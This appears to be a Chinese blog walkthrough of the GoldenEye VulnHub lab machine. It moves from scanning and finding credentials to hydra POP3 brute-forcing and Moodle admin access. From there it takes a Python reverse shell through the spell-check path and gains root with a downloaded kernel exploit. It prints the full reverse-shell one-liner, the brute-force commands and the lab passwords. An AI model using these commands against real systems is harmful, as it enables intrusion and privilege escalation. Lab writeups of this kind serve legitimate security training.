GoldenEye靶机渗透

于 2024-11-06 19:42:13 发布
阅读量990 收藏 20
点赞数 23
文章标签: web安全 网络安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_58725061/article/details/143578158
版权

获取 IP 地址

扫描端口

目录扫描

访问 80 端口发现有给提示,拼接/sev-home/路径,会出现登录弹窗

查看网页源代码,发现有 js 文件

查看 js 文件发现账号密码

密码采用 html 编码,进行解码

账号:boris

密码:InvincibleHack3r

登陆成功,根据提示,利用 pop3

POP3,全称为Post Office Protocol - Version 3,即邮局协议版本3,它是TCP/IP协议族中的一员,由RFC1939定义。本协议主要用于支持使用客户端远程管理在服务器上的电子邮件。提供了SSL加密的POP3协议被称为POP3S。

使用 hydra 工具进行爆破 pop3 natalya 和 boris 两个账号的密码

echo  -e 'natalya\nboris' > dayu.txt 
hydra -L dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.81.130 -s 55007 pop3

natalya :bird

boris:secret1!

nc 登录 pop3 查看两个用户的邮件

boris
user boris
pass secret1!
list   //查看有几封邮件和每个邮件的长度
retr 1   //依次查看邮件内容
retr 2
retr 3

第三封邮件可以看到 flag 在 root 用户目录下

natalya
nc 192.168.74.145 55007
user natalya
pass bird
list   //查看有几封邮件和每个邮件的长度
retr 1   //依次查看邮件内容
retr 2

第二封邮件可以看到第三个用户的账号密码和需要配置 host 文件内容

username: xenia
password: RCP90rulez!
severnaya-station.com/gnocertdir

windows 操作系统 host文件地址:C:\Windows\System32\drivers\etc

Linux 操作系统 host文件地址:/etc/host

访问severnaya-station.com/gnocertdir

点击登录

登录xenia 用户

看到另一个用户的名字 Dr Doak doak

使用 doack 用户爆破 pop3 密码

nc 连接 pop3 查看 dr_doak 用户收到的邮件

user doak
pass goat
list
retr 1

查看邮件得到 dr_doak 账号密码

username: dr_doak
password: 4England!

登录 dr_doak 用户,在 My home 左侧 for james 目录中看到了 s3cret.txt 文件

下载 s3cret.txt 文件得到了一个路径

拼接路径得到了一张图片,把图片下载下来

http://severnaya-station.com/dir007key/for-007.jpg

使用 exiftool 工具: Exiftool是一款功能强大的开源工具,主要用于读取、写入和编辑图像、音频和视频文件的元数据。 工具使用:

  • exiftool -h 文件名:显示Exiftool的所有可用命令和选项,以及可以使用的参数。
  • exiftool 文件名:显示指定文件的详细Exif信息。

解出来一串 base64 编码的字符

eFdpbnRlcjE5OTV4IQ==

base64 解码

xWinter1995x!

使用刚刚得到的密码登录 admin 用户

查看指纹信息,网站使用 Moodle 框架

根据历史漏洞 getshell

找到一个编辑器,是Goole Spell的, 在系统路径这块如果在编辑中使用了拼写检查就会触发到 aspell 的路径,也就是反弹shell

所以如下图所示将 spell engine 改为 PSpellshell

在服务器这块找到一个很明显的提示是反弹shell的语句,默认就有的 ,改为 python 反弹 shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.91.129",2233));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

kali 监听 2233 端口

再次检查拼写发现页面卡住

成功反弹shell

执行tty,因为获得的权限无框架:执行
python -c 'import pty; pty.spawn("/bin/bash")'     ---将shell进行tty

根据上面提示 flag 在 root 用户下,所以需要提权

uname -a 获取靶机操作系统信息,根据历史漏洞进行提权

Google 搜索 Linux ubuntu 3.13.0-32 exploit,下载 exp

修改 37292.c 文件 143 行 gcc 为 cc 保存退出

在攻击脚本目录下开启 http 服务

利用 wget 获取攻击脚本

利用 c 语言的 cc 代码编译.c 文件,并赋予 exp 文件执行权限,运行 exp

cc -o exp 37292.c
chmod +x exp
./exp

提权成功,获取到 flag 的文件路径

拼接路径http://severnaya-station.com/006-final/xvf7-flag/

loml_13
关注
密码生成器
m0_73200695的博客
08-16 777
python密码生成器
vulnhub靶场——GOLDENEYE: 1 渗透记录
ShenZ的博客
02-10 2446
vulnhub—GOLDENEYE: 1 vulnhub靶场——GOLDENEYE: 1 渗透记录 About Description 一、信息搜集 二、网站渗透 三、Moodle漏洞利用
password.txt
09-08
2020最常用密码本,900w条常用密码,密码本下载。
Password.txt
08-23
LabelMatrix7 序號,
密码暴力破解与防御
2302_76672693的博客
08-04 359
密码暴力破解与防御
GoldenEye-v1(vulnhub)靶机练习实践报告
最新发布
黑战士的博客
05-28 1022
1. 观察一定要仔细\2. 熟练使用工具\3. 看到网站后要考虑其用了什么框架,是否存在漏洞可被利用;查看网页源码,是否又隐藏信息。\4. 扩展知识面,对各种框架及其可能存在的漏洞进行总结整理。
记一次GoldenEye靶场渗透测试过程
c_programj的博客
09-16 1838
记一次GoldenEye靶场渗透测试过程 靶场下载连接: 链接:https://pan.baidu.com/s/1qSU-0h8S-HyV-tkhGvCe3A 提取码:n2hq 下载完成之后,在VMware直接打开虚拟机,选择该.ova文件即可。 KALI攻击机:192.168.43.126 GoldenEye靶机:192.168.43.27 一、信息收集 1、使用nmap进行信息收集,查找同网段下的主机:namp -sP 192.168.43.0/24 Nmap -sP 扫描所在网段存货主机(可以扫到所在
小白的靶机-VulnHub-GoldenEye
wo41ge的博客
12-10 432
靶机地址 看这里 这里注意:需要将攻击机kali和靶机同设置为仅主机状态下 信息收集 使用nmap获取目标IP地址 nmap -sP 192.168.120.0/24 ip地址就是这个了:192.168.120.129 或者netdiscover 都可以 找出目标计算机上可用的开放端口和一些服务 //在目标计算机上启动nmap全端口T5速度扫描: nmap -sS -sV -T5 -A -p- 192.168.120.129 目标计算机上有四个可用的开放端口 由于目标计算机上的端口80可
vulnhub靶机GoldenEye实战(记录向)
kiwi的博客
02-01 458
接着我就去乱翻,翻到了一份邮件,是doak用户给我的。其实在另外一边我也尝试了搞25端口,因为我从来没有搞过25端口,按照老办法就是将扫描到的版本信息进行漏洞搜索,先问问度娘postfix smtp有什么漏洞,期间我查阅了大量资料,发现有一个漏洞可以进行邮件伪造,结合上面登录成功后的提示信息,我怀疑可能需要发送邮件给GNO,但是我哪里知道它的邮箱是什么,于是便在网上查阅信息,能否有一种方案能够通过ip发送,无奈,没有。我们改好了hosts文件,尝试访问登录,看起来像cms,但是我不确定,上。
password路由器常用密码.txt
07-12
%USERID1 %USERID2 %USERID3 %REVUID %USERID%REVUID 1%USERID 2%USERID %USERID98 1%REVUID 123456 654321 1998 password 1234 12345 qwerty letmein admin SZIM epicrouter user password root grouter ads adsl1234 dare 12345 anonymous 1234 anonymous 12345 adsl adsl831 qxcomm168 qxcommsupport qxcomm1688 zyxel 642 ADSL ADSL1234 ADMIN superviso adsl1234 ROOT dare conexan user password admin conexant broadmax S supervisor 12345 admin epicrouter user password 123456 0000 epicrouter utsta private epicrouter qxco
password(字典)
04-19
字典集
passwords.txt
08-11
100万+密码本超级暴利碰撞常用字典尽在其中
自写密码字典-解口令具体过程(海德拉)
m0_57069925的博客
05-25 3566
本次实验应用kali(crunch创建 hydra工具进行破解) 合适的字典会让提高你的效率
暴力字典密码破解之crypt
EthanAndEvan的博客
09-10 5802
使用crypt加密密码的暴力破解 在本文中,我们假设已经获取到用户密码的密文,从密文格式知道密码是通过crypt算法加密。下面我们尝试通过字典中的单词进行破解。 准备工作 先准备好我们获取到的密文文件。假设文件名为passwords.txt,文件内容如下: victim: HX9LLTdc/jiDE: 503:100:Iama Victim:/home/victim:/bin/s...
穷举破解linux登录密码
ppppppppp2009的专栏
02-16 1081
适用于以root用户登录后执行代码,密码存放在password.txt中,读取/etc/shadow内容,解密加密后密码 # -*- coding: utf-8 -*- import os import crypt import time import multiprocessing def decrypt_linux_passwd(find_user, salt, passwd): p
41.TCP协议的工作机制
CodeAllen嵌入式
07-06 1194
传输控制协议(Transmission Control Protocol,TCP)是一种面向连接的、可靠的、基于字节流的传输层通信协议。在 TCP 协议中,通过三次握手建立连接。通信结束后,还需要断开连接。如果在发送数据包时,没有正确被发送到目的地时,将会重新发送数据包。 本节将详细讲解 TCP 协议的工作机制。 TCP 协议作用 TCP 协议使用的是面向连接的方法进行通信的,其作用如下: 面向流的处理:TCP 以流的方式处理数据。换句话说,TCP 可以一个字节一个字节地接收数据,而不是一次接收一个预
DDoS学习工具集:DAVOSET、ddosim、GoldenEye、XOIC
3. GoldenEye-master:GoldenEye是一个用于评估网络基础设施安全性的工具,尤其是它可以用于模拟大规模的网络攻击,帮助网络安全团队测试和改进其防御策略。 4. XOIC:XOIC是一个开源的网络攻击工具,它能够发起...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值